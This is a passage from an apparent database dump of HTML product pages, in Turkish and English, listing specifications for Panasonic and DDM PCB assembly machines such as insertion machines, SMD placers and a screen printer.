1590mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 149.4pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"199\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Ağırlık</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; width: 340.85pt; border: 1pt inset #ece9d8; background-color: transparent;\" width=\"454\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2520kg</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;&nbsp;</p>','AV132','','','','av132'),(6,'Radial Insertion','<h2 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Panasonic High-Speed Radial Insertion Machine</h2>\r\n<p style=\"text-align: left;\"> </p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/panasonic/pana_rh2sb.gif\" alt=\"\" border=\"0\" /> </td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>0.14 sec/component achieving highest efficiency in the industry</strong></li>\r\n<li><strong>2.5/5.0/7.5/10 mm pitch component insertion</strong></li>\r\n<li><strong>Fixed component feeders and early component exhaust warning enables non-stop operation</strong></li>\r\n<li><strong>%100 placement rate with auto-recovery function</strong></li>\r\n<li><strong>Windows XP based LCD touch screen</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>  </p>\r\n<table id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; margin: auto 4.8pt; border: 1pt outset;\" border=\"1\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">MODEL ADI</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">RL132</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Model No</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">NM-EJR5A   -   NM-EJR6A</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Dimensions</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">L 50mm x W 50mm -  L 508mm x W 381mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Max. speed</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,14 s / piece (21000 CPH)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">No. of component input</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">NM-EJR5A =&gt; 40 / NM-EJR6A =&gt; 80 feeders</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Range of components</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Resistors, Electrolytic capacitors, Ceramic capacitors, LEDs, Transistors, Filters, Resistor networks, JIS C0805 (1989) ?Electronic Component Taping?, standard components</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Exchange time</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Approx. 2.0 s</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial;\"><span style=\"font-size: 12px;\"><b>Placement directions</b></span></span></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">1<span style=\"font-size: 10pt;\">° increments upto 360<span style=\"font-size: 10pt;\">°</span></span></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial;\"><span style=\"font-size: 12px;\"><b>Electrical source</b></span></span></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">3 faz AC 200 V 5 kVA</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial;\"><span style=\"font-size: 12px;\"><b>Pneumatic</b></span></span></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,5 MPa, 80 L/min (A.N.R)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial;\"><span style=\"font-size: 12px;\"><b>Dimensions</b></span></span></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">W 3200 mm x D 2417mm x H 1575mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial;\"><span style=\"font-size: 12px;\"><b>Mass</b></span></span></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2300kg</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\"> </p>\r\n<p> </p>','RL132','','','','rl132'),(7,'Jumper Wire Insertion','<h5 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Panasonic High-Speed Jumper Wire Insertion Machine&nbsp;</h5>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/panasonic/pana_jvk3.gif\" alt=\"\" border=\"0\" />&nbsp;</td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>0.08 saniye/malzeme hızıyla&nbsp;y&uuml;ksek dizgi hızı ve verimlilik</strong></li>\r\n<li><strong>5 mm - 31 mm arası 1/100&nbsp;aralıkla ayarlanabilen tel uzunluğu</strong></li>\r\n<li><strong>Bacak eğme uzunluğu değiştirilerek tel israfı minimuma&nbsp;indirilmiştir</strong></li>\r\n<li><strong>Otomatik koordinat d&uuml;zeltme&nbsp;fonksiyonu ile g&uuml;venilir dizgi&nbsp;</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"1\" id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; margin: auto 4.8pt; width: 587px; height: 236px; border: 1pt outset;\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">MODEL ADI</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\">\r\n<p style=\"text-align: center; line-height: 14.25pt; margin: 0cm 0cm 0pt;\" align=\"center\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">JV131</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Model No</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">NM-EJA4A</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Boyutları</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">L 50mm x W 50mm -&nbsp;&nbsp;L 508mm x W 381mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Max. Hız</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,08 s / piece</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Komponent Ambalajı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Drum on floor (Reel applicable: Optional)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Uygulanabilir Komponentler</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Jumper wire (tin-plated)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">PCB Değiştirme Zamanı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2.0 s</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Yerleştirme Y&ouml;n&uuml;</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">2 y&ouml;n (0, 90)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">G&uuml;&ccedil; Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">3 faz</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Hava Kaynağı</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">0,5 MPa, 15 L/min (A.N.R)</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Boyutlar</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">W 2810 mm x D 1480mm x H 1415mm</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><strong><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">Ağırlık</span></span></strong></td>\r\n<td style=\"font-size: 10px; padding: 0cm 5.4pt; border: 1pt inset #ece9d8; background-color: transparent;\"><span style=\"font-family: Arial; color: #655d5b; font-size: 9pt;\"><span style=\"color: #333333;\">1450kg</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>','JV131','','','','jv131'),(8,'Desktop SMD P&P - 2,100cph','<h2>CS40 Automatic Desktop SMD Placement Machine</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"background-image: text-align: left;\">\r\n<li style=\"text-align: left;\">D&uuml;ş&uuml;k hacimli ve prototip &uuml;retimler i&ccedil;in uygun maliyetli &ccedil;&ouml;z&uuml;m</li>\r\n<li style=\"text-align: left;\">Windows tabanlı yazılım ile kolay programlama</li>\r\n<li style=\"text-align: left;\">0603 chip malzemeden 25mil bacak aralıklı QFP\'ye kadar geniş aralıktaki malzemeleri dizebilme</li>\r\n<li style=\"text-align: left;\">96 adete kadar 8mm besleyici kapasitesi</li>\r\n<li style=\"text-align: left;\">Makara, t&uuml;p, d&ouml;kme, tepsi malzeme besleyiciler</li>\r\n<li style=\"text-align: left;\">Kafa &uuml;zerinde mekanik hizalama</li>\r\n<li style=\"text-align: left;\">Otomatik nozzle değiştirme</li>\r\n</ul>\r\n<p style=\"text-align: left;\"><img src=\"images/ddm/CS-40.gif\" alt=\"\" style=\"text-align: left;\" border=\"0\" />&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>MODEL ADI</td>\r\n<td>CS40</td>\r\n</tr>\r\n<tr>\r\n<td>Dizilebilen Malzeme Aralığı</td>\r\n<td>0603 chip - 35mm kare IC</td>\r\n</tr>\r\n<tr>\r\n<td>PCB Boyutları</td>\r\n<td>343mm x 560mm</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Hassasiyeti</td>\r\n<td>&plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Dizilebilen IC Bacak Aralığı</td>\r\n<td>0.635mm</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Dizgi Hızı</td>\r\n<td>2100 cph</td>\r\n</tr>\r\n<tr>\r\n<td>Pratik Dizgi Hızı</td>\r\n<td>1000-1800 cph</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Hareket Alanı</td>\r\n<td>560mm x 560mm</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Feeder Sayısı</td>\r\n<td>96 adet (8mm tape)</td>\r\n</tr>\r\n<tr>\r\n<td>Şerit Besleyiciler</td>\r\n<td>8, 12, 16, 24, 32, 44mm (Elektrikli)</td>\r\n</tr>\r\n<tr>\r\n<td>Titreşim Besleyiciler</td>\r\n<td>D&ouml;kme, t&uuml;p, &ccedil;ubuk (Frekans ve g&uuml;&ccedil;ayarlanabilir)</td>\r\n</tr>\r\n<tr>\r\n<td>Matrix Tray</td>\r\n<td>Tepsi sabitleyiciler</td>\r\n</tr>\r\n<tr>\r\n<td>Lazer Hizalama</td>\r\n<td>Yok</td>\r\n</tr>\r\n<tr>\r\n<td>Vision Sistemi</td>\r\n<td>Renkli PCB Kamera</td>\r\n</tr>\r\n<tr>\r\n<td>Dispenser Opsiyonu</td>\r\n<td>10.000 nokta/saat</td>\r\n</tr>\r\n<tr>\r\n<td>Boyutlar</td>\r\n<td>W 1016 mm x D 1067mm x H 635mm</td>\r\n</tr>\r\n</tbody>\r\n</table>','CS40','','','','cs40'),(9,'SMD P&P - 4,800cph','<h2>LS60V Advanced SMD Placement Machine with Camera</h2>\r\n<p style=\"text-align: left;\">&nbsp;<img src=\"images/ddm/LS60.jpg\" alt=\"\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 10px; text-align: left;\" border=\"0\" /></p>\r\n<li style=\"text-align: left;\">330mmx813mm dizgi alanı ve 144 besleyici kapasitesi ve kameralı hizalama sisteminin avantajları&nbsp;ile en esnek SMT dizgi sistemidir</li>\r\n<li style=\"text-align: left;\">Sınıfındaki en iyi grafik aray&uuml;z ile dakikalar i&ccedil;inde kolay programlama</li>\r\n<li style=\"text-align: left;\">Cognex Vision sistemli kameralı malzeme hizalama ile hemen&nbsp;her tip&nbsp;malzemenin hassas dizgisi m&uuml;mk&uuml;nd&uuml;r</li>\r\n<li style=\"text-align: left;\">&plusmn;0.025mm dizgi doğruluğu</li>\r\n<li style=\"text-align: left;\">Maksimum 4800cph a ulaşan dizgi hızı</li>\r\n<li style=\"text-align: left;\">0201 chip malzemeden 15mil bacak aralıklı QFP\'ye kadar geniş aralıktaki malzemeleri dizebilme</li>\r\n<li style=\"text-align: left;\">2 mikron doğrusal hassas cetvelden gelen geri besleme ile kapalı &ccedil;evrim kontrol edilen&nbsp;dizgi kafası</li>\r\n<li style=\"text-align: left;\">Makara, t&uuml;p, d&ouml;kme, tepsi malzeme besleyiciler</li>\r\n<li style=\"text-align: left;\">Kafa &uuml;zerinde kamera, lazer veya mekanik hizalama</li>\r\n<li style=\"text-align: left;\">Otomatik nozzle değiştirme&nbsp;</li>\r\n<li style=\"text-align: left;\">Harici have bağlantısına ihtiya&ccedil; duymayan sistem</li>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" style=\"cursor: default; border: 1px dashed #bbbbbb; border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>MODEL ADI</td>\r\n<td>LS60V</td>\r\n</tr>\r\n<tr>\r\n<td>PCB Boyutları</td>\r\n<td>343mm x 813mm</td>\r\n</tr>\r\n<tr>\r\n<td>Dizilebilen Malzeme Aralığı</td>\r\n<td>0201 chip - 35mm kare IC</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Hassasiyeti</td>\r\n<td>&plusmn;0.025 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Dizilebilen IC Bacak Aralığı</td>\r\n<td>0.381mm</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Dizgi Hızı</td>\r\n<td>4800 cph</td>\r\n</tr>\r\n<tr>\r\n<td>Pratik Dizgi Hızı</td>\r\n<td>2500-3600 cph</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Hareket Alanı</td>\r\n<td>560mm x 8130mm</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Feeder Sayısı</td>\r\n<td>144 adet (8mm tape)</td>\r\n</tr>\r\n<tr>\r\n<td>Şerit Besleyiciler</td>\r\n<td>8, 12, 16, 24, 32, 44mm (Elektrikli)</td>\r\n</tr>\r\n<tr>\r\n<td>Titreşim Besleyiciler</td>\r\n<td>D&ouml;kme, t&uuml;p, &ccedil;ubuk (Frekans ve g&uuml;&ccedil;ayarlanabilir)</td>\r\n</tr>\r\n<tr>\r\n<td>Matrix Tray</td>\r\n<td>Tepsi sabitleyiciler</td>\r\n</tr>\r\n<tr>\r\n<td>Lazer Hizalama</td>\r\n<td>Opsiyon</td>\r\n</tr>\r\n<tr>\r\n<td>Vision Sistemi</td>\r\n<td>Cognex Vision</td>\r\n</tr>\r\n<tr>\r\n<td>Dispenser Opsiyonu</td>\r\n<td>10.000 nokta/saat</td>\r\n</tr>\r\n<tr>\r\n<td>Boyutlar</td>\r\n<td>W 1016 mm x D 1321mm x H 1346.2mm</td>\r\n</tr>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>','LS60V','','','','ls60v'),(10,'SMD P&P - 23,000cph','<h2 style=\"text-align: left;\">Panasonic Mid-High Speed Placement Machine</h2>\r\n<ul style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; text-align: start;\">\r\n<li>High technology SMD placement solution for Mid/High volume manufacturers</li>\r\n<li>Total solution with single machine</li>\r\n<li>Best MMI interface in its class - enabling easy programming</li>\r\n<li>Range of components from 01005 upto 150x25mm connectors</li>\r\n<li>High precision placement head</li>\r\n<li>Feeder capacity of 120pcs of 8mm feeders</li>\r\n</ul>\r\n<p> </p>\r\n<table id=\"zebra-blue\" style=\"margin-left: 30px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Head</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">1 head / 14 nozzles</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Productivity</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">35,800cph (IPC9850：23,000cph)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Component</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">01005”～120×90mm</p>\r\n<p style=\"margin-left: 30px;\">150×25mm (Connector)</p>\r\n<p style=\"margin-left: 30px;\">H=28mm, W=30g</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Max PCB size</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Standard: ～510 x 460mm</p>\r\n<p style=\"margin-left: 30px;\">Long board spec: ～1500 x 460mm</p>\r\n<p style=\"margin-left: 30px;\">*For long board spec please consult our sales.</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Feeder slot</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Max. 80 slot (160 input / 8mm)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Feeder</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">NPM / CM feeder</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Dimensions</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">W1970 x D2019 x H1500mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Electric Source</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">3-phase AC 380</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Pneumatic source</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">0.5 MPa - 0.8 MPa 200 L/min (A.N.R.)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">Mass</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\">2,650 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','AM100','','','','am100'),(11,'Screen Printer - Automatic','<p style=\"text-align: left;\">&nbsp;</p>\r\n<h5 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Panasonic SP18P-L Automatic Screen Printer</h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<table style=\"font-family: Tahoma, Helvetica, Arial, sans-serif;\" border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/panasonic/PANA_sp18.gif\" alt=\"\" border=\"0\" />&nbsp;</td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<ul>&nbsp;</ul>\r\n<li>\r\n<div class=\"O\"><span style=\"position: absolute; left: -53.171875px;\">?</span><span style=\"font-size: 10pt;\">Uni-Floating baskı metodu ile kartın eğikliğinden bağımsız mükemmel dolgu performansı</span></div>\r\n</li>\r\n</ul>\r\n<ul>\r\n<li>\r\n<div class=\"O\"><span style=\"font-size: 6px;\"><span style=\"position: absolute; left: -53.171875px;\">?</span></span><span style=\"font-size: 10pt;\">Hafif temizlik yöntemi ile açıklıklardaki flux kurumaz ve kararlı miktarda lehim geçişi&nbsp;sağlanır</span></div>\r\n</li>\r\n<li>\r\n<div class=\"O\"><span style=\"font-size: 6px;\"><span style=\"position: absolute; left: -53.171875px;\">?</span></span><span style=\"font-size: 10pt;\">Gelişmiş bıçak yapısı lehimin baskı alanı dışına çıkmasını engeller ve lehim israfını önler</span></div>\r\n</li>\r\n<li>\r\n<div class=\"O\"><span style=\"font-size: 6px;\"><span style=\"position: absolute; left: 